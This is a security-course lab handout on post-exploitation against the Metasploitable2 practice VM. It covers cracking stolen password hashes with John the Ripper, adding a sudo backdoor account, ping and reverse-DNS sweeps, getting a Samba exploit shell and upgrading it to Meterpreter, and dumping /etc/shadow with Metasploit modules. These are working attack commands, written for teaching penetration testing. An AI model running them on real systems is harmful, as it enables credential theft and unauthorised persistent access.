Lab 6 - Post-Exploitation
Table of Contents
Activities
Part 1 - John the Ripper
Let's say you have password hashes from an earlier exploit. (Such as the password hashes obtain in Lab 5). While that was helpful by itself to see what usernames exist, it would be much more useful to have plaintext passwords, which could then be used to log onto other unexploited systems. How can password hashes be converted to plaintext passwords?
John the Ripper is a password "security auditing and password recovery" tool that can also be used for brute force password cracking from hashes. This process can be much faster than network-based attacks that were tried previously with Hydra. There's no network delay waiting for the target response, no need to worry about overloading the target or setting off security alarms, and the hashing attempts can be heavily parallelized.
Run John the Ripper on the hashes you swiped from Metasploitable2. (Recall that back in Lab 5 you swiped the /etc/passwd
and /etc/shadow
files and then used the unshadow
tool to merge those files into a single file.) John the Ripper has a bunch of rules for common password permutations based on usernames - maybe some of those will hit? Start with the SINGLE CRACK rule. This is for idiot passwords based on the login/GECOS information, but you might get lucky, and it's super fast to start with.
$ john --list=rules # Just to see all the different permutations possible
$ john --single metasploitable_logins.txt
Note that you don't have to provide a file in the "shadow" format - John the Ripper is perfectly capable of recognizing a wide variety of hash standards in a file with contents as simple as username:hash
.
Deliverables:
- What is the password of the
user
user? - What is the password of the
msfadmin
user? - What is the password of the
service
user?
We're making progress, but that didn't guess passwords for all of the accounts. Now run John the Ripper using a basic list of common passwords that ships with John.
$ john --wordlist=/usr/share/john/password.lst --rules metasploitable_logins.txt
Deliverables:
- What is the password of the 'sys' user?
- What is the password of the 'klog' user?
Note: John the Ripper is smart. If you re-run the command again over the same input file, it won't bother running the same tests or trying to find passwords for usernames that it already knows. These are saved in ~/.john/john.pot
. So, you can easily try multiple wordlists (e.g. small, medium, large, MASSIVE) and more complicated rules (i.e. permutations) on the same hashes.
If you want to see all the results of the password cracking on the file, and not just the most recent scan, do:
$ john --show metasploitable_logins.txt
# This will show results in the "passwd" format:
# username : password : UsedID : GroupID : User Info : Home Directory : Default Shell
Just the root password is left as a mystery... I tried the 134MB rockyou.txt
wordlist (uncompressed from /usr/share/wordlists/rockyou.txt.gz
), but without success. Some googling seems to indicate that this password is significantly harder to crack than the others.
Note that these are relatively short username and password lists to go quickly. Metasploit comes with other files to choose from (see /usr/share/metasploit-framework/data/wordlists/
) and any Pen Tester worth his or her salt will have their own curated password lists.
See Also: CrackStation.net has a 15GB (uncompressed) wordlist file: https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
You can keep track of these credentials in Metasploit using the creds
command. Add your best credential now (the msfadmin one, since we know it has sudo access) using the 'creds add' command. You will need to specify the username, password, and IP address/port/protocol/service that the login is for.
# Ensure PostgreSQL database is running
$ sudo service postgresql start
# Launch Metasploit Console
$ msfconsole
# Continue using the workspace from the last lab:
msf6> workspace 178-metasploitable2
msf6> creds add user:msfadmin password:XXXXXX address:xx.xx.xx.xx port:22 protocol:tcp service-name:ssh
Then you can search the credentials database later, either by host or by service.
msf6> creds -s ssh
msf6> creds xx.xx.xx.xx
Part 2 - Useful Post-Exploit Activities
After gaining shell access, you may want to perform some common tasks, like create a user account for you own use (rather than needing to use a fragile exploit for access each time). Or such as scan the network for other hosts that may be investigated next. This is referred to as enumeration. (See: Linux Enumeration Cheat Sheet)
Perform the following tasks on the Metasploitable2 VM via an exploit shell (any exploit will do). For each of these tasks, use only the software that is already present on the system. You are not allowed to use apt to install anything on the system.
Deliverables:
- For each task below, document each command or set of commands that you use. Don't be alarmed if the auto-grader isn't aware (yet!) of all the diversity of commands possible here.
Tip: Feel free to just log onto Metasploitable2 and try these out at the terminal. However, all of your answers must be runnable via the exploit shell, so test them at the end to make sure.
Warning: The installed programs and configuration is different between your Kali Linux and Metasploitable2 Linux VMs. Ensure that your commands actually work in the Metasploitable2 VM and accomplish the desired result!
Task 1: Grant Yourself Access: Get a list of all local users
Task 2: Grant Yourself Access: Get a list of all users with sudo access (i.e. root access). Note that, in Metasploitable2, the relevant group is called "admin", whereas in some other Linux distributions the relevant group is called "sudo"
Task 3: Grant Yourself Access: Create a new account with the username "tiger" and password "roar"
Task 4: Grant Yourself Access: Grant the "tiger" account sudo permissions
Task 5: Revoke Access: Remove sudo permissions from "tiger"
Task 6: Revoke Access: Remove the user "tiger"
Task 7: Revoke Your Access: Remove the group "tiger"
Task 8: Find out what shell you are running in via the exploit
Task 9: Do a network scan to detect other active hosts within a specific subnet that respond to ICMP pings. The intent in a pentest would be to scan inside the corporate network from your pivot machine. For testing, use either the 45.33.32.154/24
subnet (when off-campus) or 10.10.4.0/24
subnet (when on-campus). Note that you are not allowed to use nmap for this, since Nmap won't be installed on many exploited systems.
Tip: This may be easier to write as a tiny shell script rather than a fancy one-line command..._
Task 10: Do a reverse DNS scan to find the hostnames for other hosts within the subnet use used above (either 45.33.32.154/24
or 10.10.4.0/24
). The intent in a pentest would be to scan inside the corporate network from your pivot machine. But since we don't have a virtual network at the moment, we're using this testing subnet instead. Note that you are not allowed to use nmap for this, since Nmap won't be installed on many exploited systems.
Tip: This may be easier to write as a tiny shell script rather than a fancy one-line command..._
Part 3 - Meterpreter
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
Let's upgrade our shell with Meterpreter!
Reference: Upgrade a Normal Command Shell to a Metasploit Meterpreter
Continue using the workspace from the last lab:
msf6> workspace 178-metasploitable2
Use the Samba exploit from the last lab:
msf6> search type:exploit name:samba
msf6> use exploit/multi/samba/usermap_script
msf6> info
msf6> set RHOST xx.xx.xx.xx
What payloads are available for this exploit?
msf6> show payloads
Hmmmn, no Meterpreter available. Well, let's achieve it via a two step process. You can leave the payload as automatically selected here.
msf6> exploit
whoami
root
Now that you have a shell on the Metasploitable2 VM, send it to the background via CTRL-Z
and enter y
to put it in the background
Search for a post-exploit script to upgrade a shell to a Meterpreter shell, and then select it.
msf6> search shell_to_meterpreter
msf6> use post/multi/manage/shell_to_meterpreter
Learn more about this post-exploit script and the options it needs set:
msf6> info
Of the options that this post-exploit script takes, the only missing one (that is required) is SESSION, which is the session to run this script on. What are our current sessions? (Should only be one, the one we just sent to the background)
msf6> sessions
msf6> set SESSION x
# where x = num of session you just backgrounded
Run this post-exploit script
msf6> exploit
msf6> <exploit runs...>
To use the new Meterpreter shell, get the list of sessions again. You should see a new session.
msf6> sessions
Deliverables:
- What is the "type" listed for this new session?
- What username is meterpreter running as on the remote system?
- What does that username mean in terms of our access to this system?
To interact with this new shell, use the "-i" flag for sessions:
msf6> sessions -i x
# where x = num of Meterpreter session you just created
Let's explore the capabilities of Meterpreter now that it's running on the Metasploitable2 VM.
View the help menu
meterpreter> ?
Obtain some high level information about the system Meterpreter is running on:
meterpreter> sysinfo
Deliverables:
- What is the OS reported?
- What is the (processor) architecture reported?
Browse the list of running processes to get a sense of what is running on the system.
meterpreter> ps
Deliverables:
- What is the process ID of Xtightvnc? (A VNC server)
Download the /etc/passwd
and /etc/shadow
files from Metasploitable2 to your Kali machine and save them in the /tmp
directory, thus demonstrating yet another way to access files on the remote host.
meterpreter> download /etc/passwd /etc/shadow /tmp
Note: There's an UPLOAD command too!
Snoop through the ARP cache of the target host. This represents other systems on the local area network that the target has been in recent communication with. You might discover other systems worth examining next.
meterpreter> arp
To exit the meterpreter shell:
meterpreter> quit
Keep your original exploit shell running a little while longer...
Deliverables:
- What is the contents of the ARP cache? (Copy and paste in the table)
Part 4 - Post-Exploit Script
Metasploit has a number of "post-exploit" scripts that can be useful for data gathering purposes. What other post-exploit scripts exist for our Linux target?
msf6> search type:post platform:linux
Some (many?) of these look interesting, depending on what applications you think are running on the target system:
msf6> info post/linux/gather/enum_system
msf6> info post/linux/gather/enum_users_history
msf6> info post/linux/gather/hashdump
# ANOTHER way to get those password hashes
Deliverables:
- Use the
hashdump
post-exploit script to access the password hashes. (Tip: Does it require any environment variables to be set before running?) Where does the "unshadowed password file" get downloaded to on your local Kali system? - Use the
enum_system
post-exploit script to access installed packages and services, log files, cron jobs, and other interesting system artifacts. What is the package version of the Apache Tomcat 5.5 engine that is installed? (According to the Ubuntu/Debian package manager labeling) - Use the
enum_users_history
post-exploit script to access shell history, command history for various SQL servers, and the sudoers file, among other artifacts. What is the name of the configuration file that the "postgres" user edited using the "vim" text editor? (There are two files, either is acceptable)
Tip: Forget which artifact file contains what information? Do you want to see them in an organized list, preferably sorted/searchable by host? These scripts have been saving that information for you automatically.
msf6> loot
To exit your original exploit shell:
msf6> sessions
msf6> sessions -i x
# Where x = num of your original exploit
msf6> CTRL-C, followed by 'y' when prompted to Abort Session?